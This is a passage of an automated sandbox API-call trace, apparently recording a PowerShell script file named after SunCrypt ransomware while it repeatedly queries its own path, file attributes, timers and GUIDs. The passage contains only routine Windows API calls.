lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.078] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.078] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.079] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701689560897) returned 1 [0104.079] EtwEventActivityIdControl () returned 0x0 [0104.079] EtwEventActivityIdControl () returned 0x0 [0104.079] EtwEventActivityIdControl () returned 0x0 [0104.079] EtwEventActivityIdControl () returned 0x0 [0104.079] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x7c5a9a0e, Data2=0xa982, Data3=0x4d79, Data4=([0]=0x9d, [1]=0x50, [2]=0x1c, [3]=0xfe, [4]=0x1f, [5]=0x55, [6]=0x2f, [7]=0x9b))) returned 0x0 [0104.080] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.080] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701689678339) returned 1 [0104.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.080] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.080] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.081] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.104] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701692080147) returned 1 [0104.104] EtwEventActivityIdControl () returned 0x0 [0104.104] EtwEventActivityIdControl () returned 0x0 [0104.104] EtwEventActivityIdControl () returned 0x0 [0104.105] EtwEventActivityIdControl () returned 0x0 [0104.105] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xd3033b34, Data2=0x3c7c, Data3=0x4ea3, Data4=([0]=0xbf, [1]=0xc1, [2]=0xa5, [3]=0x47, [4]=0x37, [5]=0x8a, [6]=0x67, [7]=0x42))) returned 0x0 [0104.105] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.105] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701692207108) returned 1 [0104.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.106] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.106] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.114] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701693071203) returned 1 [0104.114] EtwEventActivityIdControl () returned 0x0 [0104.114] EtwEventActivityIdControl () returned 0x0 [0104.114] EtwEventActivityIdControl () returned 0x0 [0104.115] EtwEventActivityIdControl () returned 0x0 [0104.115] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x2f5b1434, Data2=0x1c80, Data3=0x4379, Data4=([0]=0xbb, [1]=0xa3, [2]=0x95, [3]=0xf5, [4]=0x40, [5]=0x47, [6]=0xfa, [7]=0x4c))) returned 0x0 [0104.115] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.115] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701693193707) returned 1 [0104.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.115] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.116] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.116] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.116] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.118] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701693465767) returned 1 [0104.118] EtwEventActivityIdControl () returned 0x0 [0104.118] EtwEventActivityIdControl () returned 0x0 [0104.118] EtwEventActivityIdControl () returned 0x0 [0104.118] EtwEventActivityIdControl () returned 0x0 [0104.118] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xbef67e67, Data2=0x7615, Data3=0x4d01, Data4=([0]=0xb3, [1]=0xf0, [2]=0xab, [3]=0x65, [4]=0xe7, [5]=0x90, [6]=0xc8, [7]=0xb5))) returned 0x0 [0104.119] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.119] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701693597157) returned 1 [0104.119] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.120] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.122] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701693852155) returned 1 [0104.122] EtwEventActivityIdControl () returned 0x0 [0104.122] EtwEventActivityIdControl () returned 0x0 [0104.122] EtwEventActivityIdControl () returned 0x0 [0104.122] EtwEventActivityIdControl () returned 0x0 [0104.122] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x684aeeaa, Data2=0xe226, Data3=0x4633, Data4=([0]=0xad, [1]=0x10, [2]=0x66, [3]=0xb3, [4]=0xa6, [5]=0xce, [6]=0xfa, [7]=0x1a))) returned 0x0 [0104.123] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.123] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701693980755) returned 1 [0104.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.123] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.125] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701694157940) returned 1 [0104.125] EtwEventActivityIdControl () returned 0x0 [0104.125] EtwEventActivityIdControl () returned 0x0 [0104.125] EtwEventActivityIdControl () returned 0x0 [0104.125] EtwEventActivityIdControl () returned 0x0 [0104.125] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x57a11451, Data2=0xe204, Data3=0x4672, Data4=([0]=0xba, [1]=0x76, [2]=0x84, [3]=0xd9, [4]=0xb3, [5]=0xb3, [6]=0x41, [7]=0x46))) returned 0x0 [0104.126] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.126] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701694282719) returned 1 [0104.126] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.127] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.133] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701694926048) returned 1 [0104.133] EtwEventActivityIdControl () returned 0x0 [0104.133] EtwEventActivityIdControl () returned 0x0 [0104.133] EtwEventActivityIdControl () returned 0x0 [0104.133] EtwEventActivityIdControl () returned 0x0 [0104.133] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x47c68b1d, Data2=0x855a, Data3=0x4505, Data4=([0]=0x8b, [1]=0xaa, [2]=0xb2, [3]=0xb0, [4]=0x0, [5]=0xf, [6]=0x3a, [7]=0x90))) returned 0x0 [0104.134] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.134] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701695065655) returned 1 [0104.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.134] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.136] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701695222433) returned 1 [0104.136] EtwEventActivityIdControl () returned 0x0 [0104.136] EtwEventActivityIdControl () returned 0x0 [0104.136] EtwEventActivityIdControl () returned 0x0 [0104.136] EtwEventActivityIdControl () returned 0x0 [0104.136] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0xc147a069, Data2=0xb613, Data3=0x48a8, Data4=([0]=0x90, [1]=0x1c, [2]=0x2c, [3]=0x7b, [4]=0xf3, [5]=0x4c, [6]=0x30, [7]=0x96))) returned 0x0 [0104.137] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.137] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701695334625) returned 1 [0104.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.137] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0104.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb48) returned 1 [0104.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.138] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee28 | out: lpPerformanceCount=0x4ebee28*=1701695488957) returned 1 [0104.138] EtwEventActivityIdControl () returned 0x0 [0104.138] EtwEventActivityIdControl () returned 0x0 [0104.138] EtwEventActivityIdControl () returned 0x0 [0104.139] EtwEventActivityIdControl () returned 0x0 [0104.139] CoCreateGuid (in: pguid=0x4ebf0ec | out: pguid=0x4ebf0ec*(Data1=0x8fe7dd9c, Data2=0xa07e, Data3=0x4fd6, Data4=([0]=0xb3, [1]=0xe1, [2]=0x4b, [3]=0x8c, [4]=0xea, [5]=0xe9, [6]=0xb2, [7]=0x5c))) returned 0x0 [0104.139] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x4ebed40, nSize=0x80 | out: lpBuffer="") returned 0x0 [0104.139] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebee60 | out: lpPerformanceCount=0x4ebee60*=1701695599678) returned 1 [0104.139] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0104.140] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0104.140] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb4c) returned 1 [0104.140] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebee10 | out: lpFileInformation=0x4ebee10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, 